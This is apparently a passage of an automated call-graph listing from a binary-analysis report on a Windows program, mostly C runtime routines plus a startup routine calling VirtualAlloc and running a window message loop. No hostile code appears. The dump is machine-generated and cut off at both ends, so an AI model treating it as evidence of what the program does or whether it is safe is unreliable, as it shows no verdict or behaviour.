calls 14467->14469 14468 10ab59f 14470 10ab5b9 14468->14470 14474 10ab5d0 14468->14474 14469->14472 14471 10a9ce9 __write 103 API calls 14470->14471 14471->14472 14472->14453 14473->14475 14474->14472 14476 10a7180 __lseeki64 76 API calls 14474->14476 14477 10ae1d7 __getbuf 70 API calls 14475->14477 14475->14478 14476->14472 14477->14478 14478->14467 14478->14468 14479->14457 16077 10ac418 16078 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 16077->16078 16079 10ac479 16078->16079 16080 10a6117 _wprintf 70 API calls 16079->16080 16081 10ac48f 16080->16081 16107 10a732b InitOnceExecuteOnce 16081->16107 16083 10ac49a 16084 10ac4bb 16083->16084 16095 10ac49e 16083->16095 16103 10ac4e9 6 library calls 16083->16103 16085 10a6117 _wprintf 70 API calls 16084->16085 16087 10ac4c0 16085->16087 16086 10a5b2a __wsetlocale_set_cat 6 API calls 16089 10ad6f9 16086->16089 16088 10a4035 _wprintf 9 API calls 16087->16088 16088->16095 16090 10ac93e 16091 10a6117 _wprintf 70 API calls 16090->16091 16092 10ac943 16091->16092 16093 10a4035 _wprintf 9 API calls 16092->16093 16093->16095 16094 10b18f7 71 API calls __woutput_p_l 16094->16103 16095->16086 16096 10ad0d3 DecodePointer 16096->16103 16097 10a8c4b _free 70 API calls 16097->16103 16098 10a8ccd __malloc_crt 70 API calls 16098->16103 16099 10ab471 105 API calls _write_string 16099->16103 16100 10af98a __isleadbyte_l 80 API calls 16100->16103 16101 10ad123 DecodePointer 16101->16103 16102 10ad14b DecodePointer 16102->16103 16103->16090 16103->16094 16103->16095 16103->16096 16103->16097 16103->16098 16103->16099 16103->16100 16103->16101 16103->16102 16104 10afaad 82 API calls __woutput_p_l 16103->16104 16105 10ab445 105 API calls _write_multi_char 16103->16105 16106 10ab40f 105 API calls _write_string 16103->16106 16104->16103 16105->16103 16106->16103 16107->16083 14719 10b1927 14720 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 14719->14720 14721 10b1988 14720->14721 14722 10a6117 _wprintf 70 API calls 14721->14722 14723 10b199c 14722->14723 14744 10a732b InitOnceExecuteOnce 14723->14744 14725 10b1e22 14730 10a5b2a __wsetlocale_set_cat 6 API calls 14725->14730 14726 10a6117 _wprintf 70 API calls 14728 10b1e17 14726->14728 14727 10b19a7 14727->14725 14729 10a66b0 __fflush_nolock 70 API calls 14727->14729 14734 10b19c3 _memset __output_p_l 14727->14734 14743 10b1dfc __output_p_l 14727->14743 14732 10a4035 _wprintf 9 API calls 14728->14732 14729->14734 14731 10b1e47 14730->14731 14732->14725 14733 10b1f96 14734->14725 14734->14733 14735 10b206c 14734->14735 14736 10b5849 83 API calls __wcstoi64 14734->14736 14734->14743 14745 10af98a 14735->14745 14736->14734 14739 10b20d0 14741 10b2dd1 __output_s_l 103 API calls 14739->14741 14740 10b2dd1 __output_s_l 103 API calls 14742 10b20b0 14740->14742 14741->14733 14742->14739 14742->14743 14743->14726 14743->14733 14744->14727 14746 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 14745->14746 14747 10af99b 14746->14747 14747->14739 14747->14740 16226 10a544e 16227 10a545a _wprintf 16226->16227 16228 10a8834 __lock 70 API calls 16227->16228 16229 10a5461 16228->16229 16230 10a546c DecodePointer 16229->16230 16231 10a5481 DecodePointer 16229->16231 16232 10a5494 16230->16232 16231->16232 16233 10a54b0 16232->16233 16234 10a54a6 EncodePointer 16232->16234 16237 10a54ca 16233->16237 16234->16233 16236 10a54bc _wprintf 16240 10a89b8 LeaveCriticalSection 16237->16240 16239 10a54d1 16239->16236 16240->16239 16249 10ab646 16250 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 16249->16250 16251 10ab6b3 16250->16251 16252 10a6117 _wprintf 70 API calls 16251->16252 16253 10ab6b8 16252->16253 16282 10a732b InitOnceExecuteOnce 16253->16282 16255 10ab6c3 16256 10ab6e9 16255->16256 16258 10ab6c7 16255->16258 16275 10ab6ff __aulldvrm __output_s_l _strlen 16255->16275 16257 10a6117 _wprintf 70 API calls 16256->16257 16259 10ab6ee 16257->16259 16261 10a5b2a __wsetlocale_set_cat 6 API calls 16258->16261 16260 10a4035 _wprintf 9 API calls 16259->16260 16260->16258 16263 10ac238 16261->16263 16262 10ac209 16262->16258 16264 10a6117 _wprintf 70 API calls 16262->16264 16265 10ac26b 16264->16265 16266 10a4035 _wprintf 9 API calls 16265->16266 16266->16258 16267 10ab40f 105 API calls _write_string 16267->16275 16268 10abda3 DecodePointer 16268->16275 16269 10a8c4b _free 70 API calls 16269->16275 16270 10af98a __isleadbyte_l 80 API calls 16270->16275 16271 10ab471 105 API calls _write_string 16271->16275 16272 10afaad 82 API calls __woutput_p_l 16272->16275 16273 10a8ccd __malloc_crt 70 API calls 16273->16275 16274 10ac23a 16276 10a6117 _wprintf 70 API calls 16274->16276 16275->16258 16275->16262 16275->16267 16275->16268 16275->16269 16275->16270 16275->16271 16275->16272 16275->16273 16275->16274 16277 10abe06 DecodePointer 16275->16277 16279 10abe2e DecodePointer 16275->16279 16281 10ab445 105 API calls _write_multi_char 16275->16281 16278 10ac23f 16276->16278 16277->16275 16280 10a4035 _wprintf 9 API calls 16278->16280 16279->16275 16280->16258 16281->16275 16282->16255 14856 10b0b5f 14857 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 14856->14857 14858 10b0bcc 14857->14858 14859 10a6117 _wprintf 70 API calls 14858->14859 14860 10b0bd1 14859->14860 14882 10a732b InitOnceExecuteOnce 14860->14882 14862 10b0d6a 14867 10a5b2a __wsetlocale_set_cat 6 API calls 14862->14867 14863 10b0d4b 14863->14862 14864 10a6117 _wprintf 70 API calls 14863->14864 14868 10b0d5f 14864->14868 14865 10b0bdc 14865->14862 14865->14863 14866 10a66b0 __fflush_nolock 70 API calls 14865->14866 14877 10b0bf8 __aulldvrm __output_s_l _strlen 14865->14877 14866->14877 14869 10b0d8d 14867->14869 14870 10a4035 _wprintf 9 API calls 14868->14870 14870->14862 14871 10af98a __isleadbyte_l 80 API calls 14871->14877 14872 10b2dd1 103 API calls __output_s_l 14872->14877 14873 10b12fa DecodePointer 14873->14877 14874 10b2e17 103 API calls _write_multi_char 14874->14877 14875 10a8c4b _free 70 API calls 14875->14877 14876 10a8ccd __malloc_crt 70 API calls 14876->14877 14877->14862 14877->14863 14877->14871 14877->14872 14877->14873 14877->14874 14877->14875 14877->14876 14878 10b135d DecodePointer 14877->14878 14879 10b1382 DecodePointer 14877->14879 14880 10b52c6 82 API calls __cftof 14877->14880 14881 10b2e43 103 API calls _write_string 14877->14881 14878->14877 14879->14877 14880->14877 14881->14877 14882->14865 16334 10b6054 16335 10b65bf _wprintf 16334->16335 16336 10b665a _wprintf 16335->16336 16337 10a8834 __lock 70 API calls 16335->16337 16338 10b65dd 16337->16338 16339 10b65e8 InterlockedDecrement 16338->16339 16340 10b6606 16338->16340 16339->16340 16342 10b65f5 16339->16342 16354 10b6664 16340->16354 16342->16340 16345 10a8c4b _free 70 API calls 16342->16345 16344 10b6654 16346 10a8c4b _free 70 API calls 16344->16346 16345->16340 16346->16336 16347 10a8834 __lock 70 API calls 16348 10b661f 16347->16348 16349 10aeb5d ___removelocaleref 8 API calls 16348->16349 16352 10b662e 16349->16352 16350 10b6647 16357 10b6670 16350->16357 16352->16350 16353 10aea03 ___freetlocinfo 70 API calls 16352->16353 16353->16350 16360 10a89b8 LeaveCriticalSection 16354->16360 16356 10b6613 16356->16344 16356->16347 16361 10a89b8 LeaveCriticalSection 16357->16361 16359 10b6677 16359->16344 16360->16356 16361->16359 15081 10b5f89 15082 10b5f95 _wprintf 15081->15082 15083 10b5fcc _wprintf 15082->15083 15084 10a8834 __lock 70 API calls 15082->15084 15085 10b5fa9 15084->15085 15086 10aec74 __updatetlocinfoEx_nolock 78 API calls 15085->15086 15087 10b5fb9 15086->15087 15089 10b5fd2 15087->15089 15092 10a89b8 LeaveCriticalSection 15089->15092 15091 10b5fd9 15091->15083 15092->15091 16429 10b589d 16432 10b5a6b 16429->16432 16431 10b58ae 16433 10b5a77 _wprintf 16432->16433 16434 10b5a8f 16433->16434 16435 10b5a7f 16433->16435 16460 10a732b InitOnceExecuteOnce 16434->16460 16436 10a60e3 __read_nolock 70 API calls 16435->16436 16459 10b5a84 _wprintf 16436->16459 16438 10b5b40 16440 10a60e3 __read_nolock 70 API calls 16438->16440 16439 10b5a94 16439->16438 16441 10b5aca 16439->16441 16439->16459 16442 10b5b45 16440->16442 16444 10b5ae9 16441->16444 16447 10b5ad8 16441->16447 16443 10a6117 _wprintf 70 API calls 16442->16443 16445 10b5ae5 16443->16445 16446 10ae482 ___lock_fhandle 72 API calls 16444->16446 16450 10a4035 _wprintf 9 API calls 16445->16450 16445->16459 16448 10b5aef 16446->16448 16449 10a60e3 __read_nolock 70 API calls 16447->16449 16451 10b5b02 16448->16451 16452 10b5b15 16448->16452 16453 10b5add 16449->16453 16450->16459 16454 10b58b7 __chsize_nolock 106 API calls 16451->16454 16455 10a6117 _wprintf 70 API calls 16452->16455 16456 10a6117 _wprintf 70 API calls 16453->16456 16457 10b5b0e 16454->16457 16455->16457 16456->16445 16461 10b5b36 16457->16461 16459->16431 16460->16439 16464 10ae94d LeaveCriticalSection 16461->16464 16463 10b5b3c 16463->16459 16464->16463 15198 10affa1 15199 10aff20 _wprintf 15198->15199 15200 10aff3a 15199->15200 15201 10aff51 15199->15201 15202 10a6117 _wprintf 70 API calls 15200->15202 15213 10a732b InitOnceExecuteOnce 15201->15213 15204 10aff3f 15202->15204 15206 10a4035 _wprintf 9 API calls 15204->15206 15205 10aff56 15207 10a4bf4 __lock_file 71 API calls 15205->15207 15209 10aff4a _wprintf 15205->15209 15206->15209 15208 10aff68 15207->15208 15214 10afd9b 15208->15214 15213->15205 15215 10afdbb 15214->15215 15216 10afef1 15214->15216 15217 10a66b0 __fflush_nolock 70 API calls 15215->15217 15244 10afeab 15216->15244 15252 10b52e1 15216->15252 15218 10afdc1 15217->15218 15221 10a66b0 __fflush_nolock 70 API calls 15218->15221 15232 10afde9 15218->15232 15220 10a5b2a __wsetlocale_set_cat 6 API calls 15222 10aff1e 15220->15222 15223 10afdd2 15221->15223 15249 10aff99 15222->15249 15226 10a66b0 __fflush_nolock 70 API calls 15223->15226 15223->15232 15224 10a66b0 __fflush_nolock 70 API calls 15225 10afe0f 15224->15225 15228 10a66b0 __fflush_nolock 70 API calls 15225->15228 15229 10afe32 15225->15229 15227 10afdde 15226->15227 15230 10a66b0 __fflush_nolock 70 API calls 15227->15230 15231 10afe1b 15228->15231 15229->15216 15233 10a66b0 __fflush_nolock 70 API calls 15229->15233 15230->15232 15231->15229 15234 10a66b0 __fflush_nolock 70 API calls 15231->15234 15232->15216 15232->15224 15235 10afe58 15233->15235 15236 10afe27 15234->15236 15237 10afe7b 15235->15237 15240 10a66b0 __fflush_nolock 70 API calls 15235->15240 15238 10a66b0 __fflush_nolock 70 API calls 15236->15238 15237->15216 15239 10afe92 15237->15239 15238->15229 15242 10b52c6 __cftof 82 API calls 15239->15242 15241 10afe64 15240->15241 15241->15237 15243 10a66b0 __fflush_nolock 70 API calls 15241->15243 15247 10afea4 15242->15247 15245 10afe70 15243->15245 15244->15220 15246 10a66b0 __fflush_nolock 70 API calls 15245->15246 15246->15237 15247->15244 15248 10ab4ea __vswprintf_helper 103 API calls 15247->15248 15248->15247 15250 10a4c63 _fwprintf 2 API calls 15249->15250 15251 10aff9f 15250->15251 15251->15209 15276 10a732b InitOnceExecuteOnce 15252->15276 15254 10b52eb 15255 10b52ef 15254->15255 15256 10a66b0 __fflush_nolock 70 API calls 15254->15256 15255->15244 15257 10b52ff 15256->15257 15258 10b530a 15257->15258 15259 10b5317 15257->15259 15260 10a6117 _wprintf 70 API calls 15258->15260 15261 10b531c 15259->15261 15269 10b5335 _wprintf 15259->15269 15271 10b530f 15260->15271 15262 10a6117 _wprintf 70 API calls 15261->15262 15262->15271 15263 10b538f 15264 10b5399 15263->15264 15265 10b5416 15263->15265 15267 10b53b5 15264->15267 15272 10b53cc 15264->15272 15266 10a9ce9 __write 103 API calls 15265->15266 15266->15271 15268 10a9ce9 __write 103 API calls 15267->15268 15268->15271 15269->15263 15270 10ae41e __isatty 71 API calls 15269->15270 15269->15271 15273 10b5384 15269->15273 15270->15273 15271->15244 15272->15271 15274 10a7180 __lseeki64 76 API calls 15272->15274 15273->15263 15275 10ae1d7 __getbuf 70 API calls 15273->15275 15274->15271 15275->15263 15276->15254 16548 10a8ea5 16551 10a8eae 16548->16551 16552 10a8834 __lock 70 API calls 16551->16552 16553 10a8eb9 DecodePointer EncodePointer 16552->16553 16556 10a89b8 LeaveCriticalSection 16553->16556 16555 10a8eac 16556->16555 15404 10a79ca 15405 10a79d7 15404->15405 15411 10a79fd 15404->15411 15408 10a79e5 15405->15408 15412 10a80be FlsGetValue 15405->15412 15413 10a80cc FlsSetValue 15408->15413 15409 10a79f5 15414 10a7893 15409->15414 15412->15408 15413->15409 15416 10a789f _wprintf 15414->15416 15415 10a78b8 15419 10a8c4b _free 70 API calls 15415->15419 15420 10a78c7 15415->15420 15416->15415 15417 10a8c4b _free 70 API calls 15416->15417 15418 10a79a9 _wprintf 15416->15418 15417->15415 15418->15411 15419->15420 15421 10a78d6 15420->15421 15422 10a8c4b _free 70 API calls 15420->15422 15423 10a78e5 15421->15423 15424 10a8c4b _free 70 API calls 15421->15424 15422->15421 15425 10a78f4 15423->15425 15426 10a8c4b _free 70 API calls 15423->15426 15424->15423 15427 10a7903 15425->15427 15428 10a8c4b _free 70 API calls 15425->15428 15426->15425 15429 10a7912 15427->15429 15430 10a8c4b _free 70 API calls 15427->15430 15428->15427 15431 10a7924 15429->15431 15432 10a8c4b _free 70 API calls 15429->15432 15430->15429 15433 10a8834 __lock 70 API calls 15431->15433 15432->15431 15434 10a792c 15433->15434 15435 10a7938 InterlockedDecrement 15434->15435 15436 10a7951 15434->15436 15435->15436 15437 10a7943 15435->15437 15450 10a79b5 15436->15450 15437->15436 15440 10a8c4b _free 70 API calls 15437->15440 15440->15436 15441 10a8834 __lock 70 API calls 15442 10a7965 15441->15442 15443 10a7996 15442->15443 15444 10aeb5d ___removelocaleref 8 API calls 15442->15444 15453 10a79c1 15443->15453 15448 10a797a 15444->15448 15447 10a8c4b _free 70 API calls 15447->15418 15448->15443 15449 10aea03 ___freetlocinfo 70 API calls 15448->15449 15449->15443 15456 10a89b8 LeaveCriticalSection 15450->15456 15452 10a795e 15452->15441 15457 10a89b8 LeaveCriticalSection 15453->15457 15455 10a79a3 15455->15447 15456->15452 15457->15455 15458 10b5bc9 15460 10b5bd5 _wprintf 15458->15460 15459 10b5c10 15461 10b5c28 15459->15461 15462 10b5c18 15459->15462 15460->15459 15465 10b5c00 15460->15465 15479 10a732b InitOnceExecuteOnce 15461->15479 15463 10a6117 _wprintf 70 API calls 15462->15463 15470 10b5c1d _wprintf 15463->15470 15467 10a6117 _wprintf 70 API calls 15465->15467 15466 10b5cbe 15468 10a6117 _wprintf 70 API calls 15466->15468 15471 10b5c05 15467->15471 15468->15471 15469 10b5c2d 15469->15466 15469->15470 15472 10b5c66 15469->15472 15473 10a4035 _wprintf 9 API calls 15471->15473 15474 10ae482 ___lock_fhandle 72 API calls 15472->15474 15473->15470 15475 10b5c6c 15474->15475 15476 10a6117 _wprintf 70 API calls 15475->15476 15477 10b5c82 __setmode_nolock 15475->15477 15476->15477 15480 10b5cb6 15477->15480 15479->15469 15483 10ae94d LeaveCriticalSection 15480->15483 15482 10b5cbc 15482->15470 15483->15482 15491 10a4bc7 15498 10a4d74 15491->15498 15494 10a4bda 15496 10a8c4b _free 70 API calls 15494->15496 15497 10a4be5 15496->15497 15511 10a4dd2 15498->15511 15500 10a4bcc 15500->15494 15501 10a9b55 15500->15501 15502 10a9b61 _wprintf 15501->15502 15503 10a8834 __lock 70 API calls 15502->15503 15507 10a9b6d 15503->15507 15504 10a9bd2 15541 10a9be9 15504->15541 15506 10a9bde _wprintf 15506->15494 15507->15504 15508 10a9ba6 DeleteCriticalSection 15507->15508 15528 10af8cb 15507->15528 15510 10a8c4b _free 70 API calls 15508->15510 15510->15507 15512 10a4dde _wprintf 15511->15512 15513 10a8834 __lock 70 API calls 15512->15513 15518 10a4ded 15513->15518 15514 10a4e8b 15524 10a4ead 15514->15524 15516 10a4c33 _wprintf 71 API calls 15516->15518 15517 10a4e97 _wprintf 15517->15500 15518->15514 15518->15516 15520 10a4cca 107 API calls __fflush_nolock 15518->15520 15521 10a4e7a 15518->15521 15520->15518 15522 10a4c9d __getstream 2 API calls 15521->15522 15523 10a4e88 15522->15523 15523->15518 15527 10a89b8 LeaveCriticalSection 15524->15527 15526 10a4eb4 15526->15517 15527->15526 15529 10af8d7 _wprintf 15528->15529 15530 10af8eb 15529->15530 15531 10af903 15529->15531 15532 10a6117 _wprintf 70 API calls 15530->15532 15534 10a4bf4 __lock_file 71 API calls 15531->15534 15537 10af8fb _wprintf 15531->15537 15533 10af8f0 15532->15533 15535 10a4035 _wprintf 9 API calls 15533->15535 15536 10af915 15534->15536 15535->15537 15544 10af85f 15536->15544 15537->15507 15597 10a89b8 LeaveCriticalSection 15541->15597 15543 10a9bf0 15543->15506 15545 10af86e 15544->15545 15546 10af882 15544->15546 15547 10a6117 _wprintf 70 API calls 15545->15547 15549 10a4d10 __flush 103 API calls 15546->15549 15558 10af87e 15546->15558 15548 10af873 15547->15548 15550 10a4035 _wprintf 9 API calls 15548->15550 15551 10af88e 15549->15551 15550->15558 15563 10aa654 15551->15563 15554 10a66b0 __fflush_nolock 70 API calls 15555 10af89c 15554->15555 15567 10b4ddc 15555->15567 15557 10af8a2 15557->15558 15559 10a8c4b _free 70 API calls 15557->15559 15560 10af93a 15558->15560 15559->15558 15561 10a4c63 _fwprintf 2 API calls 15560->15561 15562 10af940 15561->15562 15562->15537 15564 10aa66f 15563->15564 15565 10aa661 15563->15565 15564->15554 15565->15564 15566 10a8c4b _free 70 API calls 15565->15566 15566->15564 15568 10b4de8 _wprintf 15567->15568 15569 10b4e08 15568->15569 15570 10b4df0 15568->15570 15592 10a732b InitOnceExecuteOnce 15569->15592 15571 10a60e3 __read_nolock 70 API calls 15570->15571 15573 10b4df5 15571->15573 15574 10a6117 _wprintf 70 API calls 15573->15574 15578 10b4dfd _wprintf 15574->15578 15575 10b4e92 15576 10a60e3 __read_nolock 70 API calls 15575->15576 15579 10b4e97 15576->15579 15577 10b4e0d 15577->15575 15577->15578 15580 10b4e3f 15577->15580 15578->15557 15581 10a6117 _wprintf 70 API calls 15579->15581 15582 10ae482 ___lock_fhandle 72 API calls 15580->15582 15584 10b4e9f 15581->15584 15583 10b4e45 15582->15583 15585 10b4e58 15583->15585 15586 10b4e63 15583->15586 15587 10a4035 _wprintf 9 API calls 15584->15587 15588 10b4eb3 __wsopen_nolock 74 API calls 15585->15588 15589 10a6117 _wprintf 70 API calls 15586->15589 15587->15578 15590 10b4e5e 15588->15590 15589->15590 15593 10b4e8a 15590->15593 15592->15577 15596 10ae94d LeaveCriticalSection 15593->15596 15595 10b4e90 15595->15578 15596->15595 15597->15543 16654 10a56d8 16655 10a56e4 _wprintf 16654->16655 16656 10a57d3 16655->16656 16657 10a5766 _siglookup _memmove 16655->16657 16664 10a572d 16655->16664 16658 10a8834 __lock 70 API calls 16656->16658 16659 10a5799 _wprintf 16657->16659 16661 10a6117 _wprintf 70 API calls 16657->16661 16660 10a57da 16658->16660 16662 10a57f2 SetConsoleCtrlHandler 16660->16662 16663 10a5804 16660->16663 16665 10a5916 16661->16665 16662->16663 16666 10a580b 16662->16666 16667 10a582b 16663->16667 16668 10a58b1 DecodePointer 16663->16668 16664->16657 16673 10a7a18 __getptd_noexit 70 API calls 16664->16673 16669 10a4035 _wprintf 9 API calls 16665->16669 16671 10a60e3 __read_nolock 70 API calls 16666->16671 16672 10a588d DecodePointer 16667->16672 16677 10a5869 DecodePointer 16667->16677 16678 10a5835 16667->16678 16670 10a58c7 EncodePointer 16668->16670 16683 10a583d 16668->16683 16669->16659 16670->16683 16676 10a5810 GetLastError 16671->16676 16674 10a58a3 EncodePointer 16672->16674 16672->16683 16681 10a5745 16673->16681 16674->16683 16676->16663 16682 10a587f EncodePointer 16677->16682 16677->16683 16679 10a583a 16678->16679 16680 10a5845 DecodePointer 16678->16680 16679->16672 16679->16683 16680->16683 16684 10a585b EncodePointer 16680->16684 16681->16657 16685 10a8ccd __malloc_crt 70 API calls 16681->16685 16682->16683 16686 10a58ef 16683->16686 16684->16683 16685->16657 16689 10a89b8 LeaveCriticalSection 16686->16689 16688 10a58f6 16688->16657 16689->16688 16690 10afcd9 16691 10afce5 _wprintf 16690->16691 16692 10afcf1 16691->16692 16693 10afd06 _wprintf 16691->16693 16694 10a6117 _wprintf 70 API calls 16692->16694 16697 10a4c33 _wprintf 71 API calls 16693->16697 16695 10afcf6 16694->16695 16696 10a4035 _wprintf 9 API calls 16695->16696 16699 10afd01 _wprintf 16696->16699 16698 10afd16 _wprintf 16697->16698 16700 10a9a11 __stbuf 71 API calls 16698->16700 16701 10afd2a _wprintf 16700->16701 16707 10affaa 16701->16707 16703 10afd44 _wprintf 16704 10a99e0 __ftbuf 103 API calls 16703->16704 16705 10afd58 16704->16705 16733 10afd72 16705->16733 16708 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 16707->16708 16709 10b0017 16708->16709 16710 10a6117 _wprintf 70 API calls 16709->16710 16711 10b001c 16710->16711 16737 10a732b InitOnceExecuteOnce 16711->16737 16713 10b018e 16719 10a5b2a __wsetlocale_set_cat 6 API calls 16713->16719 16714 10b0af8 16715 10a6117 _wprintf 70 API calls 16714->16715 16717 10b0afd 16715->16717 16716 10b0027 16716->16713 16716->16714 16718 10a66b0 __fflush_nolock 70 API calls 16716->16718 16721 10b0043 __aulldvrm __output_s_l _strlen 16716->16721 16720 10a4035 _wprintf 9 API calls 16717->16720 16718->16721 16722 10b0b2b 16719->16722 16720->16713 16721->16713 16721->16714 16723 10af98a __isleadbyte_l 80 API calls 16721->16723 16724 10b2dd1 103 API calls __output_s_l 16721->16724 16725 10b06f8 DecodePointer 16721->16725 16726 10b2e43 103 API calls _write_string 16721->16726 16727 10a8c4b _free 70 API calls 16721->16727 16728 10a8ccd __malloc_crt 70 API calls 16721->16728 16729 10b075b DecodePointer 16721->16729 16730 10b0780 DecodePointer 16721->16730 16731 10b52c6 82 API calls __cftof 16721->16731 16732 10b2e17 103 API calls _write_multi_char 16721->16732 16722->16703 16723->16721 16724->16721 16725->16721 16726->16721 16727->16721 16728->16721 16729->16721 16730->16721 16731->16721 16732->16721 16734 10afd77 _wprintf 16733->16734 16735 10a4c9d __getstream 2 API calls 16734->16735 16736 10afd82 16735->16736 16736->16699 16737->16716 12445 10a3cf5 12481 10a7f04 12445->12481 12447 10a3cfa _wprintf 12486 10a80dd GetStartupInfoW 12447->12486 12449 10a3d10 12488 10a7bcc GetProcessHeap 12449->12488 12451 10a3d68 12454 10a3d73 12451->12454 12591 10a3e89 12451->12591 12489 10a7b33 12454->12489 12455 10a3d79 12456 10a3e89 _fast_error_exit 70 API calls 12455->12456 12457 10a3d84 __ioinit0 __RTC_Initialize 12455->12457 12456->12457 12458 10a3d93 GetCommandLineA 12457->12458 12510 10a7fde GetEnvironmentStringsW 12458->12510 12463 10a3db8 12534 10a7e23 12463->12534 12467 10a3dc9 12552 10a4517 12467->12552 12468 10a44dd __amsg_exit 70 API calls 12468->12467 12470 10a3dd1 12471 10a3ddc 12470->12471 12473 10a44dd __amsg_exit 70 API calls 12470->12473 12558 10a8183 12471->12558 12473->12471 12476 10a3df0 12477 10a3dff 12476->12477 12606 10a47cd 12476->12606 12609 10a4508 12477->12609 12480 10a3e04 _wprintf 12482 10a7f27 12481->12482 12483 10a7f34 GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 QueryPerformanceCounter 12481->12483 12482->12483 12485 10a7f2b 12482->12485 12484 10a7f75 12483->12484 12484->12485 12485->12447 12487 10a80f3 12486->12487 12487->12449 12488->12451 12612 10a461a RtlEncodePointer 12489->12612 12494 10a7b41 12620 10a7ba9 12494->12620 12498 10a7b53 12498->12494 12499 10a7b5e 12498->12499 12630 10a8c83 12499->12630 12502 10a7ba0 12504 10a7ba9 __mtterm 73 API calls 12502->12504 12506 10a7ba5 12504->12506 12505 10a7b7f 12505->12502 12507 10a7b85 12505->12507 12506->12455 12636 10a7a87 12507->12636 12509 10a7b8d GetCurrentThreadId 12509->12455 12511 10a7ff1 WideCharToMultiByte 12510->12511 12512 10a3da3 12510->12512 12514 10a805b FreeEnvironmentStringsW 12511->12514 12515 10a8024 12511->12515 12523 10a7bf6 12512->12523 12514->12512 12516 10a8ccd __malloc_crt 70 API calls 12515->12516 12517 10a802a 12516->12517 12517->12514 12518 10a8031 WideCharToMultiByte 12517->12518 12519 10a8050 FreeEnvironmentStringsW 12518->12519 12520 10a8047 12518->12520 12519->12512 12521 10a8c4b _free 70 API calls 12520->12521 12522 10a804d 12521->12522 12522->12519 12524 10a7c09 GetModuleFileNameA 12523->12524 12525 10a7c04 12523->12525 12527 10a7c36 12524->12527 12915 10a9215 12525->12915 12909 10a7ca7 12527->12909 12529 10a3dad 12529->12463 12599 10a44dd 12529->12599 12531 10a8ccd __malloc_crt 70 API calls 12532 10a7c6f 12531->12532 12532->12529 12533 10a7ca7 _parse_cmdline 80 API calls 12532->12533 12533->12529 12535 10a7e2c 12534->12535 12539 10a7e31 _strlen 12534->12539 12536 10a9215 ___initmbctable 96 API calls 12535->12536 12536->12539 12537 10a3dbe 12537->12467 12537->12468 12538 10a7e5c 12540 10a8c83 __calloc_crt 70 API calls 12538->12540 12539->12537 12539->12538 12548 10a7e67 _strlen 12540->12548 12541 10a7eb9 12542 10a8c4b _free 70 API calls 12541->12542 12543 10a7ec5 12542->12543 12543->12537 12544 10a8c83 __calloc_crt 70 API calls 12544->12548 12545 10a7ee0 12547 10a8c4b _free 70 API calls 12545->12547 12547->12543 12548->12537 12548->12541 12548->12544 12548->12545 12549 10a7ef7 12548->12549 13362 10aef4a 12548->13362 12550 10a4060 ___get_qualified_locale 8 API calls 12549->12550 12551 10a7f03 12550->12551 12553 10a4523 __IsNonwritableInCurrentImage 12552->12553 13371 10a8de9 12553->13371 12555 10a4541 __initterm_e 12557 10a4562 __IsNonwritableInCurrentImage 12555->12557 13374 10a8c36 12555->13374 12557->12470 12559 10a818f 12558->12559 12561 10a8194 12558->12561 12560 10a9215 ___initmbctable 96 API calls 12559->12560 12560->12561 12562 10aee90 __wincmdln 80 API calls 12561->12562 12563 10a3de2 12561->12563 12562->12561 12564 10a28a0 12563->12564 13439 10a3542 12564->13439 12568 10a28c5 13455 10a3b7f 12568->13455 12570 10a28ce 12571 10a3c76 _fseek 108 API calls 12570->12571 12572 10a28dd VirtualAlloc 12571->12572 13468 10a377a 12572->13468 12576 10a2930 RegisterWindowMessageW 12577 10a2952 _memset 12576->12577 12578 10a2970 6 API calls 12577->12578 12579 10a2a0d MonitorFromRect GetMonitorInfoW 12578->12579 12580 10a2a02 12578->12580 12581 10a2a3f 12579->12581 12582 10a2a37 ExitProcess 12579->12582 12580->12476 13471 10a1420 GetWindowTextLengthW SendMessageW 12581->13471 12585 10a2a9a 12587 10a2ab0 IsDialogMessageW 12585->12587 12586 10a2afd 12586->12476 12588 10a2aec GetMessageW 12587->12588 12589 10a2ac5 TranslateAcceleratorW 12587->12589 12588->12586 12588->12587 12589->12588 12590 10a2ade TranslateMessage DispatchMessageW 12589->12590 12590->12588 12592 10a3e9a 12591->12592 12593 10a3e95 12591->12593 12595 10a5b96 __NMSG_WRITE 70 API calls 12592->12595 12594 10a5b39 __FF_MSGBANNER 70 API calls 12593->12594 12594->12592 12596 10a3ea2 12595->12596 12597 10a43c0 __mtinitlocknum 3 API calls 12596->12597 12598 10a3eac 12597->12598 12598->12454 12600 10a5b39 __FF_MSGBANNER 70 API calls 12599->12600 12601 10a44e5 12600->12601 12602 10a5b96 __NMSG_WRITE 70 API calls 12601->12602 12603 10a44ed 12602->12603 14329 10a45a8 12603->14329 12607 10a469e _doexit 70 API calls 12606->12607 12608 10a47dc 12607->12608 12608->12477 12610 10a469e _doexit 70 API calls 12609->12610 12611 10a4513 12610->12611 12611->12480 12613 10a462b __init_pointers __initp_misc_winsig 12612->12613 12648 10a8e87 EncodePointer 12613->12648 12615 10a4649 12616 10a8983 12615->12616 12617 10a898f 12616->12617 12618 10a8995 InitializeCriticalSectionAndSpinCount 12617->12618 12619 10a7b3d 12617->12619 12618->12617 12619->12494 12629 10a80a2 FlsAlloc 12619->12629 12621 10a7bb3 12620->12621 12623 10a7bb9 12620->12623 12649 10a80b0 FlsFree 12621->12649 12624 10a889e DeleteCriticalSection 12623->12624 12625 10a88ba 12623->12625 12650 10a8c4b 12624->12650 12627 10a88c6 DeleteCriticalSection 12625->12627 12628 10a7b46 12625->12628 12627->12625 12628->12455 12629->12498 12632 10a8c8a 12630->12632 12633 10a7b6b 12632->12633 12634 10a8ca8 Sleep 12632->12634 12675 10af1b3 12632->12675 12633->12502 12635 10a80cc FlsSetValue 12633->12635 12634->12632 12635->12505 12637 10a7a93 _wprintf 12636->12637 12685 10a8834 12637->12685 12639 10a7ac9 InterlockedIncrement 12692 10a7b21 12639->12692 12642 10a8834 __lock 69 API calls 12643 10a7aea 12642->12643 12695 10ae973 InterlockedIncrement 12643->12695 12645 10a7b08 12707 10a7b2a 12645->12707 12647 10a7b15 _wprintf 12647->12509 12648->12615 12649->12623 12651 10a8c7d __dosmaperr 12650->12651 12652 10a8c54 HeapFree 12650->12652 12651->12623 12652->12651 12653 10a8c69 12652->12653 12656 10a6117 12653->12656 